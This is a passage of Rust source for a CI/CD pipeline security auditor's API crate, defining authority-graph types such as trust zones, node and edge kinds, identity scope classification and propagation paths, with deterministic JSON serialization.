/// step's container declared via a non-default `dependsOn:` value. Default ADO
/// behaviour ("depends on the previous job/stage") is NOT stamped — only
/// explicit overrides.
///
/// Currently a parser-side hook for future cross-job taint rules; no consumer
/// rule exists yet.
pub const META_DEPENDS_ON: &str = "depends_on";
1228
1229// ── Shared serde helpers ─────────────────────────────────────────
1230
1231/// Serialize a `HashMap<String, V>` with keys in sorted order. The
1232/// in-memory representation stays a `HashMap` (cheaper insertion, hot
1233/// path on every parser); only the serialized form is canonicalised.
1234/// This is the single point of determinism control for graph metadata
1235/// emitted via JSON / SARIF / CloudEvents — without it, HashMap iteration
1236/// order leaks per-process randomness into every diff and cache key.
1237///
1238/// Public so the engine crate (`taudit-core`) can apply the same
1239/// canonical ordering to its `AuthorityGraph` HashMap fields.
1240#[doc(hidden)]
1241pub fn serialize_string_map_sorted<S, V>(
1242    map: &HashMap<String, V>,
1243    serializer: S,
1244) -> Result<S::Ok, S::Error>
1245where
1246    S: Serializer,
1247    V: Serialize,
1248{
1249    let sorted: BTreeMap<&String, &V> = map.iter().collect();
1250    sorted.serialize(serializer)
1251}
1252
1253// ── Graph-level precision markers ────────────────────────────────
1254
/// The category of reason why a graph is partial.
///
/// Serialized in `snake_case` (`expression`, `structural`, `opaque`).
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum GapKind {
    /// A template or matrix expression hides a value; graph structure is intact.
    Expression,
    /// An unresolvable component (composite action, reusable workflow, extends,
    /// include) breaks the authority chain.
    Structural,
    /// The graph cannot be built at all (zero steps produced, unknown platform).
    Opaque,
}
1267
/// How complete is this authority graph? Parsers set this based on whether
/// they could fully resolve all authority relationships in the pipeline YAML.
///
/// A `Partial` graph is still useful — it just tells the consumer that some
/// authority paths may be missing. This is better than silent incompleteness.
///
/// Serialized in `snake_case` (`complete`, `partial`, `unknown`).
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum AuthorityCompleteness {
    /// Parser resolved all authority relationships.
    Complete,
    /// Parser found constructs it couldn't fully resolve (e.g. secrets in
    /// shell strings, composite actions, reusable workflows). The graph
    /// captures what it can, but edges may be missing.
    Partial,
    /// Parser couldn't determine completeness.
    Unknown,
}
1285
/// How broad is an identity's scope? Classifies the risk surface of tokens,
/// service principals, and OIDC identities.
///
/// Serialized in `snake_case` (`broad`, `constrained`, `unknown`). Use
/// [`IdentityScope::from_permissions`] to derive a scope from a permissions
/// string.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum IdentityScope {
    /// Wide permissions: write-all, admin, or unscoped tokens.
    Broad,
    /// Narrow permissions: contents:read, specific scopes.
    Constrained,
    /// Scope couldn't be determined — treat as risky.
    Unknown,
}
1298
1299impl IdentityScope {
1300    /// Classify an identity scope from a permissions string.
1301    pub fn from_permissions(perms: &str) -> Self {
1302        let p = perms.to_lowercase();
1303        if p.contains("write-all") || p.contains("admin") || p == "{}" || p.is_empty() {
1304            IdentityScope::Broad
1305        } else if p.contains("write") {
1306            // Any write permission = broad (conservative)
1307            IdentityScope::Broad
1308        } else if p.contains("read") {
1309            IdentityScope::Constrained
1310        } else {
1311            IdentityScope::Unknown
1312        }
1313    }
1314}
1315
1316// ── Node types ───────────────────────────────────────────────────
1317
/// Semantic kind of a graph node.
///
/// Serialized in `snake_case` (`step`, `secret`, `artifact`, `identity`,
/// `image`).
#[allow(missing_docs)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum NodeKind {
    /// An executing unit of the pipeline (e.g. a GHA workflow step or a
    /// GitLab CI job).
    Step,
    /// A secret; together with `Identity`, a possible authority origin.
    Secret,
    /// Data produced by one step and consumed by another.
    Artifact,
    /// A token, service principal, or OIDC identity.
    Identity,
    /// An image or action a step delegates execution to (also used for
    /// self-hosted agent pools).
    Image,
}
1329
/// Trust classification. Explicit on every node — not inferred from kind.
///
/// Serialized in `snake_case` (`first_party`, `third_party`, `untrusted`).
/// For comparisons via [`TrustZone::is_lower_than`] the zones order as
/// `Untrusted` < `ThirdParty` < `FirstParty`.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum TrustZone {
    /// Code/config authored by the repo owner.
    FirstParty,
    /// Marketplace actions, external images (pinned).
    ThirdParty,
    /// Unpinned actions, fork PRs, user input.
    Untrusted,
}
1341
1342impl TrustZone {
1343    /// Returns true if `self` is a lower trust level than `other`.
1344    pub fn is_lower_than(&self, other: &TrustZone) -> bool {
1345        self.rank() < other.rank()
1346    }
1347
1348    fn rank(&self) -> u8 {
1349        match self {
1350            TrustZone::FirstParty => 2,
1351            TrustZone::ThirdParty => 1,
1352            TrustZone::Untrusted => 0,
1353        }
1354    }
1355}
1356
/// A node in the authority graph.
#[allow(missing_docs)]
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Node {
    /// Identifier of this node; edges refer to nodes by this id.
    pub id: NodeId,
    /// Semantic kind of the node (step, secret, artifact, identity, image).
    pub kind: NodeKind,
    /// Name of the node. NOTE(review): presumably the human-readable label
    /// taken from the pipeline definition — confirm against the parsers.
    pub name: String,
    /// Trust classification, set explicitly rather than inferred from `kind`.
    pub trust_zone: TrustZone,
    /// Flexible metadata: pinning status, digest, scope, permissions, etc.
    /// Serialized in sorted-key order so JSON / SARIF / CloudEvents output
    /// is byte-deterministic across runs (HashMap iteration is randomised
    /// per process, which would otherwise break diffs and cache keys).
    #[serde(serialize_with = "serialize_string_map_sorted")]
    pub metadata: HashMap<String, String>,
}
1372
1373// ── Edge types ───────────────────────────────────────────────────
1374
/// Edge semantics model authority/data flow — not syntactic YAML relations.
/// Design test: "Can authority propagate along this edge?"
///
/// Serialized in `snake_case` (e.g. `has_access_to`, `delegates_to`). The
/// derived `Ord` follows variant declaration order.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum EdgeKind {
    /// Step -> Secret or Identity (authority granted at runtime).
    HasAccessTo,
    /// Step -> Artifact (data flows out).
    Produces,
    /// Artifact -> Step (authority flows from artifact to consuming step).
    Consumes,
    /// Step -> Image/Action (execution delegation).
    UsesImage,
    /// Step -> Step (cross-job or action boundary).
    DelegatesTo,
    /// Step -> Secret or Identity (credential written to disk, outliving the step's lifetime).
    /// Distinct from HasAccessTo: disk persistence is accessible to all subsequent steps
    /// and processes with filesystem access, not just the step that created it.
    PersistsTo,
}
1395
/// Abbreviated authority context for **`HasAccessTo` → identity** edges in
/// JSON exports (ADR 0002 Phase 2). Copied from the target identity's trust
/// zone and selected `metadata` keys so consumers need not reverse-engineer
/// raw `META_*` strings for common questions. Omitted on edges where absent.
///
/// Every field is optional: a `None` field is left out of the serialized
/// output and a missing field deserializes back to `None`.
#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
pub struct AuthorityEdgeSummary {
    /// Target identity trust zone (`first_party` / `third_party` / `untrusted`).
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub trust_zone: Option<String>,
    /// Copy of `identity_scope` metadata when present.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub identity_scope: Option<String>,
    /// Copy of `permissions` metadata when present, truncated for bounded JSON
    /// (see [`AUTHORITY_EDGE_SUMMARY_FIELD_MAX`]).
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub permissions_summary: Option<String>,
}
1412
/// Maximum characters per summary string field on [`AuthorityEdgeSummary`].
///
/// NOTE(review): this constant only declares the limit; the truncation itself
/// is presumably applied by the code that builds the summary — confirm.
pub const AUTHORITY_EDGE_SUMMARY_FIELD_MAX: usize = 192;
1415
/// A directed edge in the authority graph.
#[allow(missing_docs)]
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Edge {
    /// Identifier of this edge; propagation paths list edges by this id.
    pub id: EdgeId,
    /// Node the edge starts at.
    pub from: NodeId,
    /// Node the edge points to.
    pub to: NodeId,
    /// Authority/data-flow semantics of the edge.
    pub kind: EdgeKind,
    /// Present on `has_access_to` edges whose target is an identity node.
    /// Left out of the serialized output when `None`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub authority_summary: Option<AuthorityEdgeSummary>,
}
1428
1429// ── Pipeline source ──────────────────────────────────────────────
1430
/// Where the pipeline definition came from.
///
/// Optional fields are left out of the serialized output when `None`.
#[allow(missing_docs)]
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PipelineSource {
    /// The pipeline definition file. NOTE(review): presumably a path relative
    /// to the repository root — confirm against the parsers.
    pub file: String,
    /// Repository the file belongs to, when known.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub repo: Option<String>,
    /// Git ref the file was read at, when known.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub git_ref: Option<String>,
    /// SHA of the commit being analyzed; reproducibility hint when set.
    /// Parsers leave None; CI integrations populate this from the build env.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub commit_sha: Option<String>,
}
1445
1446// ── Pipeline parameter spec ──────────────────────────────────────
1447
/// Pipeline-level parameter declaration captured from a top-level
/// `parameters:` block. Used by rules that need to reason about whether
/// caller-supplied parameter values are constrained (`values:` allowlist)
/// or free-form (no allowlist on a string parameter — shell-injection risk).
///
/// The parameter's name is not stored here. NOTE(review): presumably the
/// owning collection is keyed by parameter name — confirm at the use site.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ParamSpec {
    /// Declared parameter type (`string`, `number`, `boolean`, `object`, etc.).
    /// Empty string when the YAML omitted `type:` (ADO defaults to string).
    pub param_type: String,
    /// True when the parameter declares a `values:` allowlist that constrains
    /// the set of acceptable inputs. When true, free-form shell injection is
    /// not possible because the runtime rejects any value outside the list.
    pub has_values_allowlist: bool,
}
1462
1463// ── Propagation path (wire type for Finding.path) ────────────────
1464
/// A path that authority took through the graph.
/// The path is the product — it's what makes findings persuasive.
///
/// This is a **wire type**: it serialises into `Finding.path` in JSON output
/// and SARIF `properties.path`. The BFS algorithm that produces these paths
/// lives in `taudit-core::propagation` (workspace-internal); this struct is
/// the stable contract.
#[allow(missing_docs)]
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PropagationPath {
    /// The authority origin (Secret or Identity).
    pub source: NodeId,
    /// Where authority ended up.
    pub sink: NodeId,
    /// The full edge path from source to sink, as edge ids.
    pub edges: Vec<EdgeId>,
    /// Did this path cross a trust zone boundary?
    pub crossed_boundary: bool,
    /// If crossed, from which zone to which zone: `(from, to)`.
    /// Left out of the serialized output when `None`.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub boundary_crossing: Option<(TrustZone, TrustZone)>,
}
taudit_api/lib.rs

taudit_api/
lib.rs